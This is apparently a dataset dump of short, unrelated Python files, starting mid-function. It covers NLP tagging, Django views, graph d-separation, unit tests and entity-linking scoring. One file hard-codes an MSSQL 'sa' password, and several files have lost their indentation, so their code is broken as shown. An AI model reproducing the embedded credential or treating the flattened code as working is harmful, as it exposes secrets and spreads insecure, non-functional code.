#pos = nltk.pos_tag(token, lang='rus')
lemma = morph.parse(token)[0].normal_form
if pos != None:
current_file, stressed_word, biggest_suffix, stress_type = process_stresses('NOUN', rules_noun, pos, lemma, token, original_token, word_possible_stress, current_file)
if biggest_suffix == '':
current_file,stressed_word, biggest_suffix, stress_type = process_stresses('ADJF', rules_adj, pos, lemma, token, original_token, word_possible_stress, current_file)
if biggest_suffix == '':
current_file, stressed_word, biggest_suffix, stress_type = process_stresses('VERB', rules_verb, pos, lemma, token, original_token, word_possible_stress, current_file)
if stressed_word == '':
stressed_word = original_token
stressed_words.append(stressed_word)
biggest_suffixes.append(biggest_suffix)
stress_types.append(stress_type)
poses.append(pos)
return(current_file, stressed_words, biggest_suffixes, stress_types, poses)
|
9,284 | 81fa3129d971fe8296a89a7b772d61ff50a8b9f7 | from game import BaseGame
class First(BaseGame):
    """Single-die game: a roll of 1 or 2 wins 2.8x the stake."""
    key = 'F'
    code = 'FIRST'
    short_description = 'Vinci se esce 1 o 2. x2.8'
    long_description = (
        'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'
        ' puntato.')
    min_bet = 20
    multiplier = 2.8

    def has_won(self, draws):
        """True when the first drawn die shows 1 or 2."""
        first_draw = draws[0]
        return first_draw == 1 or first_draw == 2
|
9,285 | 866571341a587c8b1b25437f5815429875bbe5ad | import thread
import time
import ctypes
lib = ctypes.CDLL('/home/ubuntu/workspace/35SmartPy/CAN/brain/CANlib.so')
init = lib.init
read = lib.readGun
read.restype = ctypes.POINTER(ctypes.c_ubyte * 8)
send = lib.sendBrake
init()
|
9,286 | 80b8b77498f915a85185f829e8c7d5becdab8068 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from .document import ParsedDocument,XmlDocument
from .corenlp import StanfordCoreNLP
from .annotation import KBPAnnMgr,ApfAnnMgr
import os
import codecs
import sys
from . import _list_files
def _sequence_tag_bio(doc):
outlines = u''
mentions= doc._annotate
sentences = doc._text_spans
for id,sentence in enumerate(sentences):
tokens= sentence['tokens']
tok_num = len(tokens)
mention_tags = ['O']* tok_num
coref_tags = ['-']*tok_num
for mention in mentions:
if mention['sent_id'] != id:
continue
mention_tokens= mention['mention_tokens']
md_tag = mention['md_tag']
coref_tag = mention['coref_tag']
tokids=[]
for token in mention_tokens:
(sent, tok) = [int(d) for d in token.split('_')]
if sent != id:
print 'mention cross sentence at {}'.format(sentence['origin_text'])
continue
tokids.append(tok)
for pos,tokid in enumerate(tokids):
curr_md = md_tag
curr_coref = coref_tag
if pos ==0:
curr_md = 'B-' + curr_md
else:
curr_md = 'I-' +curr_md
if pos == 0:
curr_coref = '(' + curr_coref
if pos == len(tokids) -1:
curr_coref = curr_coref + ')'
if pos > 0 and pos < len(tokids) -1:
curr_coref = '-'
if mention_tags[tokid] == 'O':
mention_tags[tokid] = curr_md
coref_tags[tokid]= curr_coref
source =[]
target =[]
for token,mention,coref in zip(tokens,mention_tags, coref_tags):
token_feature= [token['word_lower'].replace(u'#',u'@'), token['word'].replace(u'#',u'@'),
token['caps'].replace(u'#',u'@'), token['pos'].replace(u'#',u'@'),
token['ner'].replace(u'#',u'@')]
if token.has_key(u'comb-word'):
token_feature.append( token[u'comb-word'].replace(u'#',u'@'))
source.append('#'.join(token_feature))
target.append(mention)
source = u' '.join(source)
target = u' '.join(target)
outlines += u'{}|||{} </s>\n'.format(source,target)
return outlines
def build_tree_tag(mentions, tok_num):
mentions.sort(cmp = lambda x,y:cmp(x[0], y[0]))
tag_out=[('X',[],[]) for i in range(tok_num)]
for mention in mentions:
(start,end, mtype)= mention
tag_out[start][1].append('('+mtype)
tag_out[end][2].append(')'+mtype)
otags=[]
for tag in tag_out:
pre= ' '.join(tag[1]).strip()
suc =' '.join(tag[2][::-1]).strip()
if pre != '':
otags.append(pre)
otags.append(tag[0])
if suc != '':
otags.append(suc)
otags= ' '.join(otags)
max_tag_num = max([len(x[1]) for x in tag_out])
if max_tag_num >1:
print 'nested tag:{}'.format(otags)
return otags
def _sequence_tag_x(doc):
outlines = u''
mentions= doc._annotate
sentences = doc._text_spans
for id,sentence in enumerate(sentences):
tokens= sentence['tokens']
tok_num = len(tokens)
curr_mentions = []
for mention in mentions:
if mention['sent_id'] != id:
continue
mention_tokens= mention['mention_tokens']
md_tag = mention['md_tag']
tok_start= int(mention_tokens[0].split('_')[1])
tok_end = int(mention_tokens[-1].split('_')[1])
curr_mentions.append((tok_start,tok_end, md_tag))
target =build_tree_tag(curr_mentions, tok_num)
source =[]
for token in tokens:
token_feature= [token['word_lower'].replace(u'#',u'@'), token['word'].replace(u'#',u'@'),
token['caps'].replace(u'#',u'@'), token['pos'].replace(u'#',u'@'),
token['ner'].replace(u'#',u'@')]
if token.has_key(u'comb-word'):
token_feature.append( token[u'comb-word'].replace(u'#',u'@'))
source.append('#'.join(token_feature))
source = u' '.join(source)
outlines += u'{}|||{} </s>\n'.format(source,target.decode('utf-8'))
return outlines
#in format 'BIO' will ignore all nested tags,in format 'XX' will build tree sequence
def gen_sequence_tags(json_dir, outfile, fmt='BIO', encoding = 'utf-8'):
fout= codecs.open(outfile, 'w', encoding= encoding)
seqtag_func= None
if fmt == 'BIO':
seqtag_func= _sequence_tag_bio
elif fmt =='XX':
seqtag_func= _sequence_tag_x
else:
print 'unknown format {}'.format(fmt)
return
files = _list_files(json_dir, '.json')
for f in files:
print 'processing {}'.format(f)
doc = ParsedDocument()
doc.load(f)
outlines = seqtag_func(doc)
fout.write(outlines)
fout.flush()
fout.close()
|
9,287 | 8efee4ad16e938e85a500e5aebf5154b5708b277 | from graph import Graph
import ast
import itertools
def add_nodes(g):
nodes = ['a', 'b', 'c', 'd']
for n in nodes:
g.add_node(n)
def add_desc(g):
desc = [('b', 'a'), ('b', 'c'), ('d', 'c')]
for d in desc:
g.add_desc(d)
def add_edges(g):
edges = [('b', 'a'), ('b', 'c'), ('d', 'c')]
for e in edges:
g.add_edge(e)
def read_all_paths(n):
all_paths = {}
with open(n+'.txt', 'r') as infile:
for line in infile:
path = ast.literal_eval(line)
if path:
dest = path[-1][0]
if dest in all_paths:
all_paths[dest].append(path)
else:
all_paths[dest] = [path]
return all_paths
def is_blocked(path, obs_dict, g):
    """Return True if *path* is blocked (in the d-separation sense) given
    the observations.

    path is a sequence of (node, direction) edges; obs_dict maps node name
    -> 0/1 observed flag.  A transition blocks the path when it is either a
    v-structure whose descendants are all unobserved, or a non-collider
    whose middle node is observed.
    """
    prev_edge = []
    for cur_edge in path:
        # try to find blocking transitions - either non-observed v-structures, or observed regulars
        if prev_edge:
            prev_node, prev_dir = prev_edge
            cur_node, cur_dir = cur_edge
            if prev_dir == 1 and cur_dir == 0:
                # V-structure
                # NOTE(review): direction codes 1-then-0 are taken to mean
                # arrows colliding at prev_node — confirm against Graph's
                # path encoding.
                blocking_v = True
                # The collider blocks only if it AND all its descendants
                # are unobserved.
                for n in g.nodes[prev_node].desc:
                    if obs_dict[n]:
                        blocking_v = False
                if blocking_v:
                    return True
            else:
                # not V-structure
                if obs_dict[prev_node]:
                    return True
        prev_edge = cur_edge
    return False
def is_indep(obs_dict, all_paths, g):
    """Independence holds exactly when every path between the pair is
    blocked given the observations in *obs_dict*."""
    return all(is_blocked(path, obs_dict, g) for path in all_paths)
if __name__=='__main__':
g = Graph()
add_nodes(g)
add_edges(g)
add_desc(g)
g.print_all_edges()
g.print_all_descs()
for n in g.nodes.keys():
g.get_all_paths(n, n)
all_nodes = list(g.nodes.keys())
all_paths = {}
for n in all_nodes:
all_paths[n] = read_all_paths(n)
s = len(all_nodes)
obs_dict = {}
combs = list(itertools.product([0,1], repeat = s))
for c in combs:
for n, val in zip(all_nodes, c):
obs_dict[n] = val
for i, j in itertools.combinations(all_nodes, 2):
indep = is_indep(obs_dict, all_paths[i][j], g)
if indep:
observed = [all_nodes[idx] for idx, val in enumerate(c) if val]
if (not (i in observed)) and (not (j in observed)):
print(i, j, str(observed))
# print(i, j, str([all_nodes[idx] for idx, val in enumerate(c) if val]))
g.reset_files()
|
9,288 | 97b94f3388a6e2473d43e3c4c4e281a86a031dbb | #!/usr/bin/python
# -*- coding: UTF-8 -*-
def parse(node, array):
    """Emit the Lua snippet that creates and configures a ScrollView named
    *node* from the exported attribute dict *array*."""
    lines = ["\t%s = ScrollView:create();\n" % node]
    if array.get('IsBounceEnabled'):
        lines.append("\t%s:setBounceEnabled(true);\n" % node)
    inner = array.get('InnerNodeSize')
    if inner is not None:
        lines.append("\t%s:setInnerContainerSize({width = %.2f, height = %.2f});\n"
                     % (node, inner['Width'], inner['Height']))
    direction = array['ScrollDirectionType']
    if direction == 'Horizontal':
        lines.append("\t%s:setDirection(0);\n" % node)
    elif direction == 'Vertical':
        lines.append("\t%s:setDirection(1);\n" % node)
    return ''.join(lines)
9,289 | 73058bd9533ef6c0d1a4faf96930077147631917 | # This script runs nightly to process users' preinstall history
# no it doesn't, you liar
from bson.objectid import ObjectId
import ConfigParser
import os
from text_processing.textprocessing import start_text_processing_queue
from pymongo import MongoClient
import time
from os import listdir
from os.path import isfile, join
CONFIG_FILENAME = 'app.config'
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
IMPORT_DIR = os.path.join(BASE_DIR, "static", "import")
# read in app config
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASE_DIR,CONFIG_FILENAME))
#DB
uri = "mongodb://"+ config.get('db','user')+ ":"+ config.get('db','pass')+"@" +config.get('db','host') + ":" + config.get('db','port')
db_client = MongoClient(uri)
db = db_client[config.get('db','name')]
db_user_history_collection = db[config.get('db','user_history_item_collection')]
db_user_collection = db[config.get('db','user_collection')]
#find users who have preinstall history
users = db_user_collection.find({ "history-pre-installation": {"$exists":1}, "history-pre-installation-processed": {"$exists":0} }, {"history-pre-installation":1, "_id":1, "username":1})
for user in users:
print "Processing browser history for " + user["username"]
historyItems = user["history-pre-installation"]
print str(len(historyItems)) + " items to process"
userID = str(user["_id"])
# start text queue for each item
for historyObject in historyItems:
print historyObject["url"]
historyObject["userID"] = userID;
historyObject["preinstallation"] = "true"
#check that we haven't already added this item
count = db_user_history_collection.find({ "userID" : userID, "url":historyObject["url"], "lastVisitTime": historyObject["lastVisitTime"] }).count()
if count == 0:
args = (historyObject, config, False);
start_text_processing_queue(*args)
else:
print "Already added this item - skipping..."
#mark that we've processed their browsing history
db_user_collection.update({ "_id": ObjectId(userID)},{ "$set":{'history-pre-installation-processed':1}}) |
9,290 | 051062a78d3f8b0caefd15f7a57a8500ddc019a6 | import unittest
from HTMLTestRunner import HTMLTestRunner
discover = unittest.defaultTestLoader.discover(start_dir='./',
pattern='test*.py',
top_level_dir=None)
f = open('report.html', 'wb+')
runner = HTMLTestRunner(stream=f,
title="web自动化",
description="自动化测试报告详情")
runner.run(discover)
f.close()
|
9,291 | 89518f43934710ef2e7471a91128e20d2306d6f6 | from django.shortcuts import render_to_response
from mousedb.animal.models import Animal, Strain
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.db import connection
import datetime
@login_required
def todo(request):
    """Render the husbandry to-do list: mice needing ear tags, genotyping
    (N.D. genotype, excluding pure C57BL/6) or weaning."""
    eartag_list = Animal.objects.filter(MouseID__isnull=True, Alive=True).order_by('Strain','Background','Rack','Cage')
    genotype_list = Animal.objects.filter(Genotype="N.D.", Alive=True).exclude(Strain__Strain="C57BL/6").order_by('Strain','Background','Rack','Cage')
    # Animals born within the last 30 days with no weaning date recorded.
    wean = datetime.date.today() - datetime.timedelta(days=30)
    wean_list = Animal.objects.filter(Born__gt=wean).filter(Weaned=None,Alive=True).exclude(Strain=2).order_by('Strain','Background','Rack','Cage')
    return render_to_response('todo.html', {'eartag_list':eartag_list, 'wean_list':wean_list, 'genotype_list':genotype_list},context_instance=RequestContext(request))
@login_required
def home(request):
    """Render the dashboard with overall and currently-alive counts of
    cages, animals and strains."""
    # NOTE(review): cursor appears unused — possibly left over from a raw
    # SQL count; confirm before removing.
    cursor = connection.cursor()
    cage_list = Animal.objects.values("Cage")
    cage_list_current = Animal.objects.filter(Alive=True).values("Cage")
    animal_list = Animal.objects.all()
    animal_list_current = Animal.objects.filter(Alive=True)
    strain_list = Strain.objects.all()
    strain_list_current = Strain.objects.filter(animal__Alive=True)
    return render_to_response('home.html', {'animal_list':animal_list, 'animal_list_current':animal_list_current, 'strain_list':strain_list, 'strain_list_current':strain_list_current, 'cage_list':cage_list, 'cage_list_current':cage_list_current},context_instance=RequestContext(request))
|
9,292 | 5d9ace3b6c5b4e24fc3b20b5e5640f2fcdb252bb | # Stubs for torch.nn.utils (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_
from .convert_parameters import parameters_to_vector, vector_to_parameters
from .spectral_norm import remove_spectral_norm, spectral_norm
from .weight_norm import remove_weight_norm, weight_norm
|
9,293 | b1fbc8f3616b70e5d35898fd895c37e838c87dc9 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 05:48:57 2019
@author: emama
"""
import datetime as dt
t = dt.datetime.today()
print(t) |
9,294 | 7d3d4476343579a7704c4c2b92fafd9fa5da5bfe | import socket
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect(('localhost', 9999))
clientsocket.send('hallooooo')
|
9,295 | 12dc248a95a84603065e23ce8fd33163bfcd2d3e | __author__ = 'gaa8664'
import pymssql
class Connection:
    """Context manager yielding a pymssql cursor on ProdigiousDB.

    Usage: ``with Connection() as cursor: ...`` — the cursor and the
    underlying connection are closed on exit.
    """
    def __init__(self):
        # SECURITY: credentials (including the 'sa' account password) are
        # hard-coded in source — move them to configuration/secrets storage.
        self.connection = pymssql.connect(server = 'gditsn033\SQLPROD', database='ProdigiousDB', user='sa', password='sgrh@2016')
    def __enter__(self):
        self.cursor = self.connection.cursor()
        return self.cursor
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.cursor.close()
        self.connection.close()
9,296 | 654adc9b77bbad6ba36dd42125e69e1a4ad1312d | import random
import time
import unittest
from math import radians
from maciErrType import CannotGetComponentEx
from DewarPositioner.positioner import Positioner, NotAllowedError
from DewarPositioner.cdbconf import CDBConf
from Acspy.Clients.SimpleClient import PySimpleClient
from DewarPositionerMockers.mock_components import MockDevice, MockSource
class PositionerOffsetTest(unittest.TestCase):
def setUp(self):
self.cdbconf = CDBConf()
self.p = Positioner(self.cdbconf)
self.source = MockSource()
try:
client = PySimpleClient()
self.device = client.getComponent('RECEIVERS/SRTKBandDerotator')
self.using_mock = False
print '\nWARNING -> using the real component'
except CannotGetComponentEx:
print '\nINFO -> component not available: we will use a mock device'
self.device = MockDevice()
self.using_mock = True
def tearDown(self):
self.p.park()
time.sleep(0.2)
def _test_set_get(self):
"""Verify the set and get methods"""
# Not allowed when the system is not yet configured
self.assertRaises(NotAllowedError, self.p.setOffset, 2)
self.p.setup(siteInfo={}, source=None, device=self.device)
self.p.setOffset(2)
self.assertEqual(self.p.getOffset(), 2)
self.assertEqual(self.p.getPosition(), 2)
self.p.clearOffset()
self.assertEqual(self.p.getOffset(), 0)
def _test_set_new_pos(self):
"""Vefify the setOffset set a new position."""
self.p.setup(siteInfo={}, source=None, device=self.device)
time.sleep(0.3) if self.using_mock else time.sleep(3)
act_position = self.device.getActPosition()
offset = 0.5
self.p.setOffset(offset)
time.sleep(0.3) if self.using_mock else time.sleep(3)
self.assertAlmostEqual(
self.p.getPosition(),
act_position + offset,
places=1
)
self.assertAlmostEqual(
act_position + offset,
self.device.getActPosition(),
places=1
)
def _test_out_of_range(self):
"""Cause a rewind in case the offset is out of range"""
self.cdbconf.setup('KKG')
self.cdbconf.setConfiguration('CUSTOM_OPT')
az, el, latitude = [radians(50)] * 3
site_info = {'latitude': latitude}
self.p.setup(site_info, self.source, self.device)
self.p.setRewindingMode('AUTO')
offset = 20
max_limit = self.device.getMaxLimit()
min_limit = self.device.getMinLimit()
Pis = max_limit - offset/2
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.p.setPosition(Pis)
time.sleep(0.2) # Wait a bit for the setup
max_rewinding_steps = (max_limit - min_limit) // self.device.getStep()
expected = Pis - max_rewinding_steps*self.device.getStep() + offset
self.source.setAzimuth(az)
self.source.setElevation(el)
self.p.startUpdating('MNG_TRACK', 'ANT_NORTH', az, el, None, None)
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.p.setOffset(offset)
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.assertEqual(self.device.getActPosition(), expected)
if __name__ == '__main__':
unittest.main()
|
9,297 | 5fa9c9908d4aea507cf0ca8287a6b8e5b391470a | import configparser
import shutil
def get_imagemagick_path():
    """Return the path of ImageMagick's ``convert`` executable.

    The path is read from the ``[commands]`` section of
    ``settings/settings.ini``.  When the file, the section, or the
    ``convert`` option is missing, fall back to looking ``convert`` up
    on the PATH via :func:`shutil.which` (which returns ``None`` if the
    executable is not installed).
    """
    config = configparser.ConfigParser()
    # ConfigParser.read() silently ignores a missing file, leaving the
    # parser empty -- the original config['commands'] lookup then raised
    # KeyError.  Guard with has_option(), which is False for a missing
    # section as well as a missing option.
    config.read("settings/settings.ini")
    if config.has_option('commands', 'convert'):
        return config['commands']['convert']
    return shutil.which("convert")
|
9,298 | 17f76c2b53b36c81cea7f7616859f5257790cd73 | #!/usr/bin/env python
from django.http import HttpResponse
try:
import simplejson as json
except ImportError:
import json
from api import *
def index(request):
    """Landing view: greet the signed-in user or redirect to OAuth.

    Parses the signed request; when it carries no ``user_id`` the user
    is not authenticated, so a JavaScript top-frame redirect to the
    OAuth request URL is returned.  Otherwise a plain greeting is sent.
    """
    data = parse_signed_request(request)
    # dict.has_key() was removed in Python 3; the `in` operator works in
    # both Python 2 and 3.
    if 'user_id' not in data:
        request_url = oauth_request_url()
        return HttpResponse("<script>top.location.href='%s';</script>" % request_url)
    return HttpResponse("Welcome %s" % data['user_id'])
9,299 | a19616d448da057d5be0af841467a25baaacf5b3 | import numpy as np
from load_data import load_entity, load_candidates2, load_train_data
def predict_batch(test_data, model, batch_size=None):
    """Run `model` on one batch of inputs and return its raw predictions."""
    return model.predict(test_data, batch_size=batch_size)
def predict_data(test_data, entity_path, model, predict_path, score_path, test_path, dataset):
    """Evaluate the entity-linking model and dump per-mention scores.

    For every (data, labels, raw_data) batch in `test_data`, the model
    scores each candidate entity; the argmax candidate is taken as the
    prediction.  Wrongly-linked mentions are written to `predict_path`,
    all candidate scores to `score_path`.  For the 'clef' dataset the
    final accuracy comes from `post_predict` (threshold-based
    re-scoring); otherwise the raw argmax accuracy is returned.
    """
    entity_dict, id_map = load_entity(entity_path)
    acc_cnt, total_cnt = 0, 0
    w_l = ''         # accumulated lines describing wrong predictions
    all_score = ''   # accumulated per-candidate score lines
    for data, labels, raw_data in test_data:
        total_cnt += 1
        # raw_data: (ground-truth entity id, document id, mention text)
        groud_truth, doc_id, mention = raw_data[0], raw_data[1], raw_data[2]
        raw_entity_list = data['entity_name']
        pred_result = predict_batch(data, model, batch_size=len(labels))
        # Flatten the per-candidate scores into one flat list.
        pred_result = [j for r in pred_result for j in r]
        pred_index = np.argmax(pred_result)
        pred_label = labels[pred_index]
        pred_entity_name = raw_entity_list[pred_index]
        # All candidate scores for this mention, one TSV line.
        all_score += doc_id + '\t' + mention
        for index, score in enumerate(pred_result):
            entity_id = labels[index]
            entity_name = raw_entity_list[index]
            all_score += '\t' + entity_id + '\t' + entity_name + '\t' + str(round(score, 4))
        all_score += '\n'
        if pred_label == groud_truth:
            acc_cnt += 1
        else:
            # write wrong results down
            if groud_truth in id_map:
                groud_truth = id_map[groud_truth]
            ground_name = ''
            # '+' marks a composite id with no single entity name.
            if '+' in groud_truth:
                ground_name = groud_truth
            else:
                if groud_truth not in entity_dict:
                    ground_name = ground_name
                else:
                    ground_name = entity_dict[groud_truth][0]
            w_l += doc_id + '\t' + mention + '\t' + groud_truth + '\t' + \
                   ground_name + '\t' + pred_label + '\t' + pred_entity_name + '\n'
    # NOTE(review): denominator is total_cnt+1, not total_cnt -- looks
    # like an off-by-one (perhaps a division-by-zero guard); confirm.
    accuracy = 1.0 * acc_cnt / (total_cnt+1)
    with open(predict_path, 'w', encoding='utf8')as f:
        f.write(w_l)
    with open(score_path, 'w', encoding='utf8')as f:
        f.write(all_score)
    if dataset == 'clef':
        return post_predict(test_path, score_path, entity_path)
    else:
        return accuracy
def post_predict(test_path, score_path, entity_path, alpha=0.75):
    """Re-score predictions from a score file with a cui-less threshold.

    For each mention the best-scoring candidate is kept; if its score is
    below `alpha` the mention is predicted as 'cui-less'.  Accuracy is
    computed against the labels in `test_path`; wrong predictions are
    written to ../checkpoints/post_predict_result.txt.
    """
    candidate_dict = load_candidates2(score_path)
    test_data, all_data = load_train_data(test_path)
    entity_dict, _ = load_entity(entity_path)
    acc_cnt, w_l = 0, ''
    predict_dict = dict()  # mention -> (predicted entity id, entity name)
    for mention, candidates in candidate_dict.items():
        # Single candidate: accept it unconditionally (no threshold).
        if len(candidates) == 1:
            predict_dict[mention] = (candidates[0][0], candidates[0][1])
            continue
        # Find the highest-scoring (id, name, score) triple.
        max_score, max_can = candidates[0][2], candidates[0]
        for e_id, e_name, e_score in candidates:
            if e_score > max_score:
                max_score = e_score
                max_can = (e_id, e_name, e_score)
        e_id, e_name, e_score = max_can
        # Below-threshold best score => the mention has no CUI.
        if e_score < alpha:
            e_id, e_name = 'cui-less', 'cui-less'
        predict_dict[mention] = (e_id, e_name)
    for doc_id, mention, label in all_data:
        # Normalize the cui-less label's casing.
        if str.lower(label) == 'cui-less':
            label = 'cui-less'
        pred_label, pred_entity_name = predict_dict[mention]
        if pred_label == label:
            acc_cnt += 1
        else:
            entity_name = 'None'
            if label in entity_dict:
                entity_name = entity_dict[label][0]
            w_l += doc_id + '\t' + mention + '\t' + label + '\t' + \
                   entity_name + '\t' + pred_label + '\t' + pred_entity_name + '\n'
    with open('../checkpoints/post_predict_result.txt', 'w')as f:
        f.write(w_l)
    total_cnt = len(all_data)
    accuracy = 1.0 * acc_cnt / (total_cnt)
    return accuracy
if __name__ == '__main__':
flag = 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.